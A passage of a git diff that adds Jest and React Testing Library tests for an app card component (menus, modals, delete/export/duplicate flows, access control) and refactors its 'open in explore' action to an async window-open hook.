AccessMode.EXTERNAL_MEMBERS } + const { container } = render() + const tooltip = container.querySelector('[title="app.accessItemsDescription.external"]') + expect(tooltip).toBeInTheDocument() + }) + }) + + describe('Card Interaction', () => { + it('should handle card click', () => { + render() + const card = screen.getByTitle('Test App').closest('[class*="cursor-pointer"]') + expect(card).toBeInTheDocument() + }) + + it('should call getRedirection on card click', () => { + const { getRedirection } = require('@/utils/app-redirection') + render() + const card = screen.getByTitle('Test App').closest('[class*="cursor-pointer"]')! + fireEvent.click(card) + expect(getRedirection).toHaveBeenCalledWith(true, mockApp, mockPush) + }) + }) + + describe('Operations Menu', () => { + it('should render operations popover', () => { + render() + expect(screen.getByTestId('custom-popover')).toBeInTheDocument() + }) + + it('should show edit option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + }) + }) + + it('should show duplicate option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.duplicate')).toBeInTheDocument() + }) + }) + + it('should show export option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.export')).toBeInTheDocument() + }) + }) + + it('should show delete option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('common.operation.delete')).toBeInTheDocument() + }) + }) + + it('should show switch option for chat mode apps', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText(/switch/i)).toBeInTheDocument() + }) + }) + + it('should show switch option for completion mode apps', async () => { + const completionApp = { ...mockApp, mode: AppModeEnum.COMPLETION } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText(/switch/i)).toBeInTheDocument() + }) + }) + + it('should not show switch option for workflow mode apps', async () => { + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.queryByText(/switch/i)).not.toBeInTheDocument() + }) + }) + }) + + describe('Modal Interactions', () => { + it('should open edit modal when edit button is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const editButton = screen.getByText('app.editApp') + fireEvent.click(editButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + }) + + it('should open duplicate modal when duplicate button is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const duplicateButton = screen.getByText('app.duplicate') + fireEvent.click(duplicateButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + }) + + it('should open confirm dialog when delete button is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const deleteButton = screen.getByText('common.operation.delete') + fireEvent.click(deleteButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + }) + + it('should close confirm dialog when cancel is clicked', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + const deleteButton = screen.getByText('common.operation.delete') + fireEvent.click(deleteButton) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('cancel-confirm')) + + await waitFor(() => { + expect(screen.queryByTestId('confirm-dialog')).not.toBeInTheDocument() + }) + }) + + it('should close edit modal when onHide is called', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.editApp')) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + + // Click close button to trigger onHide + fireEvent.click(screen.getByTestId('close-edit-modal')) + + await waitFor(() => { + expect(screen.queryByTestId('edit-app-modal')).not.toBeInTheDocument() + }) + }) + + it('should close duplicate modal when onHide is called', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.duplicate')) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + + // Click close button to trigger onHide + fireEvent.click(screen.getByTestId('close-duplicate-modal')) + + await waitFor(() => { + expect(screen.queryByTestId('duplicate-modal')).not.toBeInTheDocument() + }) + }) + }) + + describe('Styling', () => { + it('should have correct card container styling', () => { + const { container } = render() + const card = container.querySelector('[class*="h-[160px]"]') + expect(card).toBeInTheDocument() + }) + + it('should have rounded corners', () => { + const { container } = render() + const card = container.querySelector('[class*="rounded-xl"]') + expect(card).toBeInTheDocument() + }) + }) + + describe('API Callbacks', () => { + it('should call deleteApp API when confirming delete', async () => { + render() + + // Open popover and click delete + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('common.operation.delete')) + }) + + // Confirm delete + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-confirm')) + + await waitFor(() => { + expect(appsService.deleteApp).toHaveBeenCalled() + }) + }) + + it('should call onRefresh after successful delete', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('common.operation.delete')) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-confirm')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should handle delete failure', async () => { + (appsService.deleteApp as jest.Mock).mockRejectedValueOnce(new Error('Delete failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('common.operation.delete')) + }) + + await waitFor(() => { + expect(screen.getByTestId('confirm-dialog')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-confirm')) + + await waitFor(() => { + expect(appsService.deleteApp).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: expect.stringContaining('Delete failed') }) + }) + }) + + it('should call updateAppInfo API when editing app', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.editApp')) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-edit-modal')) + + await waitFor(() => { + expect(appsService.updateAppInfo).toHaveBeenCalled() + }) + }) + + it('should call copyApp API when duplicating app', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.duplicate')) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-duplicate-modal')) + + await waitFor(() => { + expect(appsService.copyApp).toHaveBeenCalled() + }) + }) + + it('should call onPlanInfoChanged after successful duplication', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.duplicate')) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-duplicate-modal')) + + await waitFor(() => { + expect(mockOnPlanInfoChanged).toHaveBeenCalled() + }) + }) + + it('should handle copy failure', async () => { + (appsService.copyApp as jest.Mock).mockRejectedValueOnce(new Error('Copy failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.duplicate')) + }) + + await waitFor(() => { + expect(screen.getByTestId('duplicate-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-duplicate-modal')) + + await waitFor(() => { + expect(appsService.copyApp).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: 'app.newApp.appCreateFailed' }) + }) + }) + + it('should call exportAppConfig API when exporting', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(appsService.exportAppConfig).toHaveBeenCalled() + }) + }) + + it('should handle export failure', async () => { + (appsService.exportAppConfig as jest.Mock).mockRejectedValueOnce(new Error('Export failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(appsService.exportAppConfig).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: 'app.exportFailed' }) + }) + }) + }) + + describe('Switch Modal', () => { + it('should open switch modal when switch button is clicked', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + }) + + it('should close switch modal when close button is clicked', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('close-switch-modal')) + + await waitFor(() => { + expect(screen.queryByTestId('switch-modal')).not.toBeInTheDocument() + }) + }) + + it('should call onRefresh after successful switch', async () => { + const chatApp = { ...mockApp, mode: AppModeEnum.CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-switch-modal')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should open switch modal for completion mode apps', async () => { + const completionApp = { ...mockApp, mode: AppModeEnum.COMPLETION } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + }) + }) + + describe('Open in Explore', () => { + it('should show open in explore option when popover is opened', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + + await waitFor(() => { + expect(screen.getByText('app.openInExplore')).toBeInTheDocument() + }) + }) + }) + + describe('Workflow Export with Environment Variables', () => { + it('should check for secret environment variables in workflow apps', async () => { + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(workflowService.fetchWorkflowDraft).toHaveBeenCalled() + }) + }) + + it('should show DSL export modal when workflow has secret variables', async () => { + (workflowService.fetchWorkflowDraft as jest.Mock).mockResolvedValueOnce({ + environment_variables: [{ value_type: 'secret', name: 'API_KEY' }], + }) + + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(screen.getByTestId('dsl-export-modal')).toBeInTheDocument() + }) + }) + + it('should check for secret environment variables in advanced chat apps', async () => { + const advancedChatApp = { ...mockApp, mode: AppModeEnum.ADVANCED_CHAT } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(workflowService.fetchWorkflowDraft).toHaveBeenCalled() + }) + }) + + it('should close DSL export modal when onClose is called', async () => { + (workflowService.fetchWorkflowDraft as jest.Mock).mockResolvedValueOnce({ + environment_variables: [{ value_type: 'secret', name: 'API_KEY' }], + }) + + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(screen.getByTestId('dsl-export-modal')).toBeInTheDocument() + }) + + // Click close button to trigger onClose + fireEvent.click(screen.getByTestId('close-dsl-export')) + + await waitFor(() => { + expect(screen.queryByTestId('dsl-export-modal')).not.toBeInTheDocument() + }) + }) + }) + + describe('Edge Cases', () => { + it('should handle empty description', () => { + const appNoDesc = { ...mockApp, description: '' } + render() + expect(screen.getByText('Test App')).toBeInTheDocument() + }) + + it('should handle long app name', () => { + const longNameApp = { + ...mockApp, + name: 'This is a very long app name that might overflow the container', + } + render() + expect(screen.getByText(longNameApp.name)).toBeInTheDocument() + }) + + it('should handle empty tags array', () => { + const noTagsApp = { ...mockApp, tags: [] } + // With empty tags, the component should still render successfully + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle missing author name', () => { + const noAuthorApp = { ...mockApp, author_name: '' } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle null icon_url', () => { + const nullIconApp = { ...mockApp, icon_url: null } + // With null icon_url, the component should fall back to emoji icon and render successfully + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should use created_at when updated_at is not available', () => { + const noUpdateApp = { ...mockApp, updated_at: 0 } + render() + expect(screen.getByText(/edited/i)).toBeInTheDocument() + }) + + it('should handle agent chat mode apps', () => { + const agentApp = { ...mockApp, mode: AppModeEnum.AGENT_CHAT } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle advanced chat mode apps', () => { + const advancedApp = { ...mockApp, mode: AppModeEnum.ADVANCED_CHAT } + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + + it('should handle apps with multiple tags', () => { + const multiTagApp = { + ...mockApp, + tags: [ + { id: 'tag1', name: 'Tag 1', type: 'app', binding_count: 0 }, + { id: 'tag2', name: 'Tag 2', type: 'app', binding_count: 0 }, + { id: 'tag3', name: 'Tag 3', type: 'app', binding_count: 0 }, + ], + } + render() + // Verify the tag selector renders (actual tag display is handled by the real TagSelector component) + expect(screen.getByLabelText('tag-selector')).toBeInTheDocument() + }) + + it('should handle edit failure', async () => { + (appsService.updateAppInfo as jest.Mock).mockRejectedValueOnce(new Error('Edit failed')) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.editApp')) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-edit-modal')) + + await waitFor(() => { + expect(appsService.updateAppInfo).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: expect.stringContaining('Edit failed') }) + }) + }) + + it('should close edit modal after successful edit', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.editApp')) + }) + + await waitFor(() => { + expect(screen.getByTestId('edit-app-modal')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByTestId('confirm-edit-modal')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should render all app modes correctly', () => { + const modes = [ + AppModeEnum.CHAT, + AppModeEnum.COMPLETION, + AppModeEnum.WORKFLOW, + AppModeEnum.ADVANCED_CHAT, + AppModeEnum.AGENT_CHAT, + ] + + modes.forEach((mode) => { + const testApp = { ...mockApp, mode } + const { unmount } = render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + unmount() + }) + }) + + it('should handle workflow draft fetch failure during export', async () => { + (workflowService.fetchWorkflowDraft as jest.Mock).mockRejectedValueOnce(new Error('Fetch failed')) + + const workflowApp = { ...mockApp, mode: AppModeEnum.WORKFLOW } + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.export')) + }) + + await waitFor(() => { + expect(workflowService.fetchWorkflowDraft).toHaveBeenCalled() + expect(mockNotify).toHaveBeenCalledWith({ type: 'error', message: 'app.exportFailed' }) + }) + }) + }) + + // -------------------------------------------------------------------------- + // Additional Edge Cases for Coverage + // -------------------------------------------------------------------------- + describe('Additional Coverage', () => { + it('should handle onRefresh callback in switch modal success', async () => { + const chatApp = createMockApp({ mode: AppModeEnum.CHAT }) + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.switch')) + }) + + await waitFor(() => { + expect(screen.getByTestId('switch-modal')).toBeInTheDocument() + }) + + // Trigger success callback + fireEvent.click(screen.getByTestId('confirm-switch-modal')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should render popover menu with correct styling for different app modes', async () => { + // Test completion mode styling + const completionApp = createMockApp({ mode: AppModeEnum.COMPLETION }) + const { unmount } = render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + }) + + unmount() + + // Test workflow mode styling + const workflowApp = createMockApp({ mode: AppModeEnum.WORKFLOW }) + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + }) + }) + + it('should stop propagation when clicking tag selector area', () => { + const multiTagApp = createMockApp({ + tags: [{ id: 'tag1', name: 'Tag 1', type: 'app', binding_count: 0 }], + }) + + render() + + const tagSelector = screen.getByLabelText('tag-selector') + expect(tagSelector).toBeInTheDocument() + + // Click on tag selector wrapper to trigger stopPropagation + const tagSelectorWrapper = tagSelector.closest('div') + if (tagSelectorWrapper) + fireEvent.click(tagSelectorWrapper) + }) + + it('should handle popover mouse leave', async () => { + render() + + // Open popover + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByTestId('popover-content')).toBeInTheDocument() + }) + + // Trigger mouse leave on the outer popover-content + fireEvent.mouseLeave(screen.getByTestId('popover-content')) + + await waitFor(() => { + expect(screen.queryByTestId('popover-content')).not.toBeInTheDocument() + }) + }) + + it('should handle operations menu mouse leave', async () => { + render() + + // Open popover + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + }) + + // Find the Operations wrapper div (contains the menu items) + const editButton = screen.getByText('app.editApp') + const operationsWrapper = editButton.closest('div.relative') + + // Trigger mouse leave on the Operations wrapper to call onMouseLeave + if (operationsWrapper) + fireEvent.mouseLeave(operationsWrapper) + }) + + it('should click open in explore button', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const openInExploreBtn = screen.getByText('app.openInExplore') + fireEvent.click(openInExploreBtn) + }) + + // Verify openAsyncWindow was called with callback and options + await waitFor(() => { + expect(mockOpenAsyncWindow).toHaveBeenCalledWith( + expect.any(Function), + expect.objectContaining({ onError: expect.any(Function) }), + ) + }) + }) + + it('should handle open in explore via async window', async () => { + // Configure mockOpenAsyncWindow to actually call the callback + mockOpenAsyncWindow.mockImplementationOnce(async (callback: () => Promise) => { + await callback() + }) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const openInExploreBtn = screen.getByText('app.openInExplore') + fireEvent.click(openInExploreBtn) + }) + + const { fetchInstalledAppList } = require('@/service/explore') + await waitFor(() => { + expect(fetchInstalledAppList).toHaveBeenCalledWith(mockApp.id) + }) + }) + + it('should handle open in explore API failure', async () => { + const { fetchInstalledAppList } = require('@/service/explore') + fetchInstalledAppList.mockRejectedValueOnce(new Error('API Error')) + + // Configure mockOpenAsyncWindow to call the callback and trigger error + mockOpenAsyncWindow.mockImplementationOnce(async (callback: () => Promise, options: any) => { + try { + await callback() + } + catch (err) { + options?.onError?.(err) + } + }) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const openInExploreBtn = screen.getByText('app.openInExplore') + fireEvent.click(openInExploreBtn) + }) + + await waitFor(() => { + expect(fetchInstalledAppList).toHaveBeenCalled() + }) + }) + }) + + describe('Access Control', () => { + it('should render operations menu correctly', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + expect(screen.getByText('app.duplicate')).toBeInTheDocument() + expect(screen.getByText('app.export')).toBeInTheDocument() + expect(screen.getByText('common.operation.delete')).toBeInTheDocument() + }) + }) + }) + + describe('Open in Explore - No App Found', () => { + it('should handle case when installed_apps is empty array', async () => { + const { fetchInstalledAppList } = require('@/service/explore') + fetchInstalledAppList.mockResolvedValueOnce({ installed_apps: [] }) + + // Configure mockOpenAsyncWindow to call the callback and trigger error + mockOpenAsyncWindow.mockImplementationOnce(async (callback: () => Promise, options: any) => { + try { + await callback() + } + catch (err) { + options?.onError?.(err) + } + }) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const openInExploreBtn = screen.getByText('app.openInExplore') + fireEvent.click(openInExploreBtn) + }) + + await waitFor(() => { + expect(fetchInstalledAppList).toHaveBeenCalled() + }) + }) + + it('should handle case when API throws in callback', async () => { + const { fetchInstalledAppList } = require('@/service/explore') + fetchInstalledAppList.mockRejectedValueOnce(new Error('Network error')) + + // Configure mockOpenAsyncWindow to call the callback without catching + mockOpenAsyncWindow.mockImplementationOnce(async (callback: () => Promise) => { + return await callback() + }) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const openInExploreBtn = screen.getByText('app.openInExplore') + fireEvent.click(openInExploreBtn) + }) + + await waitFor(() => { + expect(fetchInstalledAppList).toHaveBeenCalled() + }) + }) + }) + + describe('Draft Trigger Apps', () => { + it('should not show open in explore option for apps with has_draft_trigger', async () => { + const draftTriggerApp = createMockApp({ has_draft_trigger: true }) + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + // openInExplore should not be shown for draft trigger apps + expect(screen.queryByText('app.openInExplore')).not.toBeInTheDocument() + }) + }) + }) + + describe('Non-editor User', () => { + it('should handle non-editor workspace users', () => { + // This tests the isCurrentWorkspaceEditor=true branch (default mock) + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + }) + + describe('WebApp Auth Enabled', () => { + beforeEach(() => { + mockWebappAuthEnabled = true + }) + + it('should show access control option when webapp_auth is enabled', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.accessControl')).toBeInTheDocument() + }) + }) + + it('should click access control button', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const accessControlBtn = screen.getByText('app.accessControl') + fireEvent.click(accessControlBtn) + }) + + await waitFor(() => { + expect(screen.getByTestId('access-control-modal')).toBeInTheDocument() + }) + }) + + it('should close access control modal and call onRefresh', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.accessControl')) + }) + + await waitFor(() => { + expect(screen.getByTestId('access-control-modal')).toBeInTheDocument() + }) + + // Confirm access control + fireEvent.click(screen.getByTestId('confirm-access-control')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should show open in explore when userCanAccessApp is true', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.openInExplore')).toBeInTheDocument() + }) + }) + + it('should close access control modal when onClose is called', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.accessControl')) + }) + + await waitFor(() => { + expect(screen.getByTestId('access-control-modal')).toBeInTheDocument() + }) + + // Click close button to trigger onClose + fireEvent.click(screen.getByTestId('close-access-control')) + + await waitFor(() => { + expect(screen.queryByTestId('access-control-modal')).not.toBeInTheDocument() + }) + }) + }) +}) diff --git a/web/app/components/apps/app-card.tsx b/web/app/components/apps/app-card.tsx index 8356cfd31c..8140422c0f 100644 --- a/web/app/components/apps/app-card.tsx +++ b/web/app/components/apps/app-card.tsx @@ -5,7 +5,7 @@ import { useContext } from 'use-context-selector' import { useRouter } from 'next/navigation' import { useTranslation } from 'react-i18next' import { RiBuildingLine, RiGlobalLine, RiLockLine, RiMoreFill, RiVerifiedBadgeLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { type App, AppModeEnum } from '@/types/app' import Toast, { ToastContext } from '@/app/components/base/toast' import { copyApp, deleteApp, exportAppConfig, updateAppInfo } from '@/service/apps' @@ -27,6 +27,7 @@ import { fetchWorkflowDraft } from '@/service/workflow' import { fetchInstalledAppList } from '@/service/explore' import { AppTypeIcon } from '@/app/components/app/type-selector' import Tooltip from '@/app/components/base/tooltip' +import { useAsyncWindowOpen } from '@/hooks/use-async-window-open' import { AccessMode } from '@/models/access-control' import { useGlobalPublicStore } from '@/context/global-public-context' import { formatTime } from '@/utils/time' @@ -64,6 +65,7 @@ const AppCard = ({ app, onRefresh }: AppCardProps) => { const { isCurrentWorkspaceEditor } = useAppContext() const { onPlanInfoChanged } = useProviderContext() const { push } = useRouter() + const openAsyncWindow = useAsyncWindowOpen() const [showEditModal, setShowEditModal] = useState(false) const [showDuplicateModal, setShowDuplicateModal] = useState(false) @@ -247,11 +249,16 @@ const AppCard = ({ app, onRefresh }: AppCardProps) => { props.onClick?.() e.preventDefault() try { - const { installed_apps }: any = await fetchInstalledAppList(app.id) || {} - if (installed_apps?.length > 0) - window.open(`${basePath}/explore/installed/${installed_apps[0].id}`, '_blank') - else + await openAsyncWindow(async () => { + const { installed_apps }: any = await fetchInstalledAppList(app.id) || {} + if (installed_apps?.length > 0) + return `${basePath}/explore/installed/${installed_apps[0].id}` throw new Error('No app found in Explore') + }, { + onError: (err) => { + Toast.notify({ type: 'error', message: `${err.message || err}` }) + }, + }) } catch (e: any) { Toast.notify({ type: 'error', message: `${e.message || e}` }) diff --git a/web/app/components/apps/empty.spec.tsx b/web/app/components/apps/empty.spec.tsx new file mode 100644 index 0000000000..8e7680958c --- /dev/null +++ b/web/app/components/apps/empty.spec.tsx @@ -0,0 +1,53 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import Empty from './empty' + +describe('Empty', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should render without crashing', () => { + render() + expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument() + }) + + it('should render 36 placeholder cards', () => { + const { container } = render() + const placeholderCards = container.querySelectorAll('.bg-background-default-lighter') + expect(placeholderCards).toHaveLength(36) + }) + + it('should display the no apps found message', () => { + render() + // Use pattern matching for resilient text assertions + expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument() + }) + }) + + describe('Styling', () => { + it('should have correct container styling for overlay', () => { + const { container } = render() + const overlay = container.querySelector('.pointer-events-none') + expect(overlay).toBeInTheDocument() + expect(overlay).toHaveClass('absolute', 'inset-0', 'z-20') + }) + + it('should have correct styling for placeholder cards', () => { + const { container } = render() + const card = container.querySelector('.bg-background-default-lighter') + expect(card).toHaveClass('inline-flex', 'h-[160px]', 'rounded-xl') + }) + }) + + describe('Edge Cases', () => { + it('should handle multiple renders without issues', () => { + const { rerender } = render() + expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument() + + rerender() + expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/apps/footer.spec.tsx b/web/app/components/apps/footer.spec.tsx new file mode 100644 index 0000000000..291f15a5eb --- /dev/null +++ b/web/app/components/apps/footer.spec.tsx @@ -0,0 +1,94 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import Footer from './footer' + +describe('Footer', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should render without crashing', () => { + render(